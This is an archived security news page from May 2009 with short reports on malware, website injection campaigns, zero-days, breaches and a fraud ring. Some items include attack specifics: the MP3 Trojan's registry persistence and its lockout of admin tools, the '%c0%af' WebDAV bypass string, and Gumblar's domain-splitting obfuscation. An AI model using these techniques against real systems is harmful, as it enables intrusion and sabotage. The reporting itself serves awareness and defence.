CyberInsecure.com

Archive for May, 2009

A new malware attempts to stop global music piracy, which incidentally seems to be on the rise lately because of the economic downturn.

It looks to have been written by some Indonesian script kiddies who seem to think that by infecting people’s computers they can stop piracy.

The malware  attempts to use the Indonesian band Samsons and their song Naluri Lelaki to entice users to click on the file. The file itself comes with a Winamp icon on it, so it looks like a regular mp3 file to the user. When the file is clicked it modifies some registry entries related to WinLogon, so the victim’s computer displays the following message box before they can log onto their computers: “Stop pembajakan Musisi Dalam Negeri, Jangan Gunakan MP3 lagi (sok sok an) huahahahahaha!!!”. It can be loosely translated to: “Stop piracy Musician Affairs, Do not Use MP3 again (quasi quasi-an) huahahahahaha!”

The Trojan will copy itself onto any mp3s found on the victim’s computer (with the same name as the mp3 file and an appended “.exe” at the end), thus destroying all mp3 files on the system.

The Trojan will also shutdown Winamp as well as copy itself to the Windows folder on the victim’s computer. The following registry entry is created to run winamp.dll.exe on startup:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
ServiceOptionMP3
<Windows>\winamp.dll.exe

The following registry entry is set, disabling the registry editor (regedit):

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
DisableRegistryTools
1

Registry entries are set as follows:

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System
DisableRegedit
1

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
NoFolderOptions
1

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
LegalNoticeCaption
STOP PIRACY!!!!

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
LegalNoticeText
Stop pembajakan Musisi Dalam Negeri, Jangan Gunakan MP3 lagi (sok sok an) huahahahahaha!!!

Credit: Prashant Kumar, SophosLabs

An infection that attempts to install a potent malware cocktail on the machines of end users has spread to about 30,000 websites run by businesses, government agencies and other organizations, researchers warned Friday.

The infection sneaks malicious javascript onto the front page of websites, most likely by exploiting a common application that leads to a SQL injection, said Stephan Chenette, manager for security research at security firm Websense. The injected code is designed to look like a Google Analytics script, and it uses obfuscated javascript, so it is hard to spot.

The malicious payload silently redirects visitors of infected sites to servers that analyze the end-user PC. Based on the results, it attempts to exploit one or more of about 10 different unpatched vulnerabilities on the visitor’s machine. If none exist, the webserver delivers a popup window that claims the PC is infected in an attempt to trick the person into installing rogue anti-virus software. The executed malware file has a very low AV detection rate.

The rogue anti-virus software uses polymorphic techniques to constantly alter its digital signature, allowing it to evade detection by the vast majority of legitimate anti-virus programs. Because it uses obfuscation, the javascript is also hard to detect by antivirus programs and impossible to spot using Google searches that scour the web for a common string or variable.

According to Chenette, “For the common user, it’s going to be possible but difficult to determine what the code is doing or if it’s indeed malicious. We can see this quickly growing.”

The infection shares many similarities with a mass website malady that’s been dubbed Gumblar. It too injects obfuscated javascript into legitimate websites in an attempt to attack visitors. So far, it’s spread to about 60,000 sites, Websense estimates.

Several differences in the way the javascript behaves, however, have led Websense researchers to believe the two attacks are unrelated.

The researchers have also noticed that the code, once it’s deobfuscated, points to web addresses that are misspellings of legitimate Google Analytics domains that many sites use to track visitor statistics. The RBN, or Russian Business Network, has used similar tactics in the past, and Websense is now working to determine whether those responsible for this latest attack have ties to that criminal outfit.

“It could be that the RBN is related, or more likely because that code was publicized, the attackers are acting in a very smart fashion to duplicate methods of old attacks to hide their tracks,” Chenette explained.

Credit: The Register

A corporate identity theft ring that exploited the identities of local corporations, religious institutions, hospitals and even schools to run a cheque fraud scam has been busted in New York.

Investigators reckon the gang of 18 suspects made millions by impersonating workers from an estimated 350 New York-based organizations. Data purchased from corrupt bank insiders was used to lay the groundwork for the scam, which relied on cashing thousands of counterfeit payroll cheques. The fraudsters also plundered the bank accounts of individual victims, using data obtained from corrupt bank insiders to transfer funds to banks under the control of the gang.

Mules were recruited as payees on the counterfeit cheques, which were forged using scanners, cheque stock, magnetic ink, company logos and specialist software. The scam ran between October 2007 and February 2009. One bank alone lost $1.4m through the scam.

The gang was led by alleged masterminds Jasper Grayson, 25, and James Malloy, 26, according to an indictment unsealed this week. Renece Razor, a former teller at a JP Morgan Chase Bank branch in Manhattan, Ilaura Walker, a former worker at a TD Bank branch in Manhattan, and Keisha Polonio, a former clerk at an HSBC Bank branch in the Bronx, are all charged with stealing the personal data of identity theft victims before supplying the details to other members of the gang.

Police are investigating the possible involvement of other suspected bank workers in the scam as part of the ongoing investigation.

Credit: The Register

A known computer hacking clan with anti-American leanings has successfully broken into at least two sensitive Web servers maintained by the U.S. Army, InformationWeek has learned exclusively.

Department of Defense and other investigators are currently probing the breaches, which have not been publicly disclosed. Department investigators subpoena records from Google, Microsoft, and Yahoo in connection with ongoing probe.

The hackers, who are based in Turkey, penetrated servers at the Army’s McAlester Ammunition Plant in McAlester, Okla., and at the U.S. Army Corps of Engineers’ Transatlantic Center in Winchester, Va.

The breach at the McAlester munitions plant occurred on Jan. 26, according to records of the investigation obtained by InformationWeek. On that date, Web users attempting to access the plant’s site were redirected to a Web page that featured a protest against climate change.

On Sept. 19, 2007, the same hackers electronically broke into Army Corps of Engineers’ servers. That hack sent Web users to another page, which at the time, contained anti-American and anti-Israeli rhetoric and images. It currently appears to be an Internet landing spot that features airline reservation links.

Beyond the redirects, it’s not clear whether the group was able to obtain sensitive information from the Army’s servers.

The hacks are the subject of an ongoing criminal investigation by Defense Department officials and members of the U.S. Army’s Judge Advocate General’s Office and Computer Emergency Response Team. Investigators have executed records search warrants against Microsoft, Yahoo, Google, and other Internet service and e-mail providers as part of their efforts to unmask the hackers’ true identities.

Investigators believe the hackers used SQL injection to exploit a security vulnerability in Microsoft’s SQL Server database to gain entry to the Web servers. The group is known to have carried out similar attacks on a number of other Web sites in the past — including against a site maintained by Internet security company Kaspersky Lab.

The hacks are troubling in that they appear to have rendered useless supposedly sophisticated Defense Department tools and procedures designed to prevent such breaches. The department and its branches spend millions of dollars each year on pricey security and antivirus software and employ legions of experts to deploy and manage the tools.

Equally troubling is the fact that the hacks appear to have originated outside the United States. Turkey is known to harbor significant elements of the al-Qaida network. It was not clear if the hackers have links to the terrorist group.

Credit: Paul McDougall, InformationWeek

Microsoft today warned that hackers are using rigged QuickTime media files to exploit an unpatched vulnerability in DirectShow, the APIs used by Windows programs for multimedia support.

The company has activated its security response process to deal with the zero-day attacks has issued a pre-patch advisory with workarounds and a one-click “fix it” feature to enable the mitigation.

From the advisory:

Microsoft is aware of limited, active attacks that use this exploit code. While our investigation is ongoing, our investigation so far has shown that Windows 2000 Service Pack 4, Windows XP, and Windows Server 2003 are vulnerable; all versions of Windows Vista and Windows Server 2008 are not vulnerable.

According to MSRC blog, the vulnerability is in the QuickTime parser in Microsoft DirectShow. An attacker would try and exploit the vulnerability by crafting a specially formed video file and then posting it on a website or sending it as an attachment in e-mail. While this isn’t a browser vulnerability, because the vulnerability is in DirectShow, a browser-based vector is potentially accessible through any browser using media plug-ins that use DirectShow. Also, we’ve verified that it is possible to direct calls to DirectShow specifically, even if Apple’s QuickTime (which is not vulnerable) is installed.

The vulnerable component was removed from Windows Vista and later operating systems but is still available for use in the Microsoft Windows 2000, Windows XP, and Windows Server 2003 operating systems.

Vulnerable Windows users should immediately consider disabling QuickTime parsing to thwart attackers. The article at http://support.microsoft.com/kb/971778 provides fix-it button that automatically enables the workaround. It also provides detailed instructions on using a managed script deployment for Windows shops.

Credit: ZDNet.com Security Blogs

Research In Motion (RIM) has warned of a vulnerability in how BlackBerry servers handle malformed PDF files that potentially leaves the door open to hacking attacks.

If corporate users of BlackBerry mobile devices are tricked into opening an email message with a booby-trapped PDF attachment, it might be possible to inject hostile code onto a vulnerable server running the BlackBerry Attachment Service, RIM warns.

BlackBerry Enterprise Server software version 4.1 Service Pack 3 (4.1.3) through 5.0 and BlackBerry Professional Software 4.1 Service Pack 4 (4.1.4) are affected. RIM has issued an an interim security software update as explained in an advisory which can be found at www.blackberry.com.

The Canadian firm is also advising customers to disable PDF file processing on the BlackBerry server, as a workaround, pending the application of a more complete fix.

The incident is far from unprecedented, but it underlines the threat unpatched PDF and Microsoft Office applications increasingly pose to corporate security, beyond the better-known threats posed by unpatched browser applications.

Credit: The Register

A lost laptop containing the personal data of 109,000 Pensions Trust members has sparked the latest in a growing list of information security breach alerts.

The missing machine was stolen from the offices of NorthgateArinso, suppliers of the Pensions Trust’s computerised pensions administration system, where it was being used “as a database for development, training and performance testing”.

Data on the drive was not encrypted but it was password protected - as if that provides much in the way of reassurance. Data held on the laptop included name, address, date of birth, NI number, name of employer, salary details, name of and relationship to nominees and, for those drawing a pension, bank account details.

Members of six of the Pension Trust’s 39 schemes were affected by the breach. The records potentially exposed data from May 2007.

The Pensions Trust sent out letters this week informing affected members that their personal details have potentially been exposed as a result of the breach.

Credit: The Register

The FBI and the US Marshals had to partially shut down their networks yesterday after they were hit by a computer virus.

According to the AP, the agencies’ computer problems began Thursday morning, while the FBI began experiencing similar problems earlier. It was decided to save the main US Justice department network from potential infection by disconnecting the US Marshall’s systems.

Various sources say that the virus might be the Neeris worm and that the problem has likely been caused by the US Marshals Service running backlevel antivirus software, Trend Micro’s OfficeScan version 5.0, and not applying patches to its computers.

Trend Micro says protection against the Neeris malware has been in OfficeScan ever since version 8. The current version is 10, but for some reason the US Marshals have not upgraded the software.

It was not as if they were short of a few dollars more. The silly federal coppers had paid for the upgrades, but simply had not installed them.

Credit: The Inquirer

Hackers have wasted no time targeting a gaping hole in Microsoft’s Internet Information Services webserver, according to administrators at Ball State University, who say servers that used the program were breached on Monday.

As of Wednesday morning California time, iWeb accounts at the Muncie, Indiana-based university remained inaccessible and service wasn’t expected to be restored until Thursday or Friday, Patty Lucas, a senior help desk support admin for Ball State’s Computing Services said. University administrators were working with Microsoft employees to investigate and fix the break in.

Microsoft representatives were investigating the breach Wednesday morning and not immediately available to comment on it.

On Monday, Microsoft confirmed what it called an “elevation of privilege vulnerability” in versions 5 and 6 of IIS when it runs an extension known as WebDAV. Microsoft said at the time it was unaware of any in-the-wild exploits of the vulnerability. The assessment was at odds with this warning in which the US Computer Emergency Response Team said it was aware of “publicly available exploit code and active exploitation of this vulnerability.”

The flaw is significant because it allows anyone with a web browser to list, access, and possibly upload files in a password-protected WebDAV folder on a vulnerable machine, according to Nikolaos Rangos, a security researcher who published his findings on Friday. The bug resides in the part of IIS that processes commands based on the WebDAV protocol.

By adding several unicode characters - specifically “%c0%af” - to a web address, attackers can trick the widely used webserver into accessing parts of the system that are supposed to be off limits to outsiders.

Microsoft’s advisory correctly points out that several conditions make the vulnerability hard to exploit in some cases. For one, WebDAV is not enabled by default in IIS6, and for another, intruders would not be able to exceed the privileges of an anonymous user. By default, such accounts are not permitted to upload files to a server.

But based on Lucas’s description, the Ball State hackers may have been able to do just that. Shortly after the attack, students checking their iWeb pages were greeted with a message that said they had been hacked. There are no indications any data was stolen or malicious files uploaded, she said.

Credit: The Register

Update (May 22): Network administrators at Ball State University have retracted their claims that a campus website was brought down by a zero-day vulnerability in Microsoft’s Internet Information Services webserver.

“Microsoft and Ball State now have identified the cause of the breach [as] a Ball State iWeb user [who] either misused or allowed the misuse of their account, and that was determined just this afternoon,” Ball State University spokesman Tony Proudfoot said on Thursday.

A Web attack that poisons Google search results is getting worse, according to security researchers.

The attack first relies on compromising normally legitimate website and planting malicious scripts. US CERT reports that stolen FTP credentials are reckoned to be the main technique in play during this stage of the attack but poor configuration settings and vulnerable web applications might also play a part.

Surfers who visit compromised websites are exposed to attacks that rely on well-known PDF and Flash Player vulnerabilities to plant malware onto Windows PCs.

This malware is designed to redirect Google search results as well as to swipe sensitive information from compromised machines, according to early findings from ongoing analysis.

The SANS Institute’s Internet Storm Centre (ISC) adds that the attack has been around for some time but has intensified over recent days. Initially the malware was served up onto vulnerable Windows clients from the website gumblar.cn, which has been offline since Friday. A second domain - martuz.cn - has taken over this key role in the attack, ISC reports.

Web security scanning firm ScanSafe, which was among the first to warn of the rise of the attack, notes that the reference to martuz.cn in more recent attacks has been obfuscated, possibly in an attempt to thwart rudimentary blacklists. “The URI resulting from the injected script might appear as mar”+”tuz.cn instead of just martuz.cn,” writes ScanSafe researcher Mary Landesman.

ScanSafe reported on Monday that Gumblar more than trebled (up 246 per cent) over the preceding week. It describes Gumblar as a botnet of compromised websites in a series of blog postings on the attack, which can be found here. Sophos reckons the Gumblar-related malware appeared in 42 per cent of all the newly infected websites it detected last week.

Credit: The Register